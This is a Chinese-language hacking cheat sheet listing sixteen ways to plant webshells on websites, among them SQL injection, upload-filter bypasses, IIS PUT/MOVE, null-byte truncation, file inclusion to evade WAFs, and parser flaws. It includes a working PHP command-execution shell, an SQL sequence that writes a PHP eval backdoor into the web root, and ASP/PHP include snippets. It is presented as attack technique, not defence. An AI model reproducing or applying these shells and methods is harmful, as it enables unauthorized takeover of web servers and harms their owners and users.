Webshell篇

常用方法简介：

一、0day拿webshell

参考工具：织梦漏洞利用小工具

二、通过注入漏洞拿Webshell

前提条件：具有足够权限，对写入木马的文件夹要有写入权限，知道网站绝对路径。

对于mssql注入漏洞，网站可以通过log备份、差异备份拿Webshell

对于mysql注入漏洞的网站可以通过into   file函数将一句话木马写入，拿Webshell。

参考工具：Getwebshell增强版、pangolin、

三、通过远程命令执行拿Webshell

zhu.php

<?php
$x=$_GET["z"];
echo  "<pre>";
echo shell_exec($x);
echo  "<pre>";
?>

然后再浏览器访问此php文件，跟一个z的参数是一句话木马，输出到cracer.php文件

跟着在浏览器访问一下这个php文件，再用菜刀连接就可以了

四、struts2拿Webshell

参考工具：鬼哥struts2、Struts2漏洞批量检测

五、通过用户上传头像拿Webshell

原理：用户注册后，有些网站可以上传头像图片、附件、文件等，可以利用此来上传Webshell

六、IIS写权限拿webshell

原理：通过找到有IIS写入权限的网站，put进去一个txt文件，目录必须有可写的权限，然后通过move方法进行重命名为xxx.php

参考工具：IIS  put scanner

七、本地JS验证突破拿Webshell

当网站设置了JS来限制用户上传的文件类型时，我们可以通过删除JS文件或者修改上传文件类型突破上传限制拿Webshell

参考工具：使用burpsuit或fiddler代理工具提交，本地文件先改为XXX.jpg，上传时拦截，再把文件名后缀更改为php即可

八、修改网站上传类型配置拿Webshell

有的网站设置了上传类型的限制，修改其上传类型即可

九、文件包含拿Webshell

先将Webshell改为txt文件上传，然后上传一个脚本文件包含该txt文件，可绕过waf拿webshell

asp包含

1.<!--#include  file="123.jpg"-->
2.调用的文件和被调用的文件必须在同一个目录，否则找不到
3.不同目录之间包含
<!--#include  virtual="文件所在目录/123.jpg"-->

php包含

<?php include ("123.jpg")?>;

十、网站配置插马拿Webshell

通过找到网站默认配置，将一句话插入网站配置中间。

十一、利用编辑器漏洞拿Webshell

常见的编辑器漏洞有fckeditor、ewebeditor、cheditor等

十二、通过编辑器模板拿Webshell

通过对网站的模板进行编辑写入一句话，然后生成脚本文件拿webshell

通过将木马添加到压缩文件，把名字改为网站模板类型，上传到网站服务器拿webshell

十三、数据库命令执行拿webshell

可以利用phpmyadmin登录数据库使用数据库命令将木马导出，拿Webshell(适用于phpmyadmin比较老的版本)

create  table  study  (cmd  text  NOT  NULL);
insert   into  study(cmd)  VALUES  ('<?php eval ($_POST[cmd])?>');
select  cmd  from  study  into  outfile  'D:/www/rooney.php';
drop  TABLE  IF  EXISTS  study;

十四、00截断拿Webshell

在上传文件的时候，你上传的文件名可能会被网站自动改成别的名字，这个时候你可以尝试抓取文件上传数据包，将文件名改为XX.asp%00.jpg进行截断上传，拿webshell

十五、利用解析漏洞拿Webshell

IIS  5.X/6.0解析漏洞
IIS  7.0/IIS  7.5 /nginx  < 8.03  畸形解析漏洞
nginx  < 8.03 空字节代码执行漏洞
Apache 解析漏洞

十六：另类拿Webshell

更新页面拿 Webshell
上传插件拿Webshell
上传特殊马拿Webshell
上传免杀马过安全软件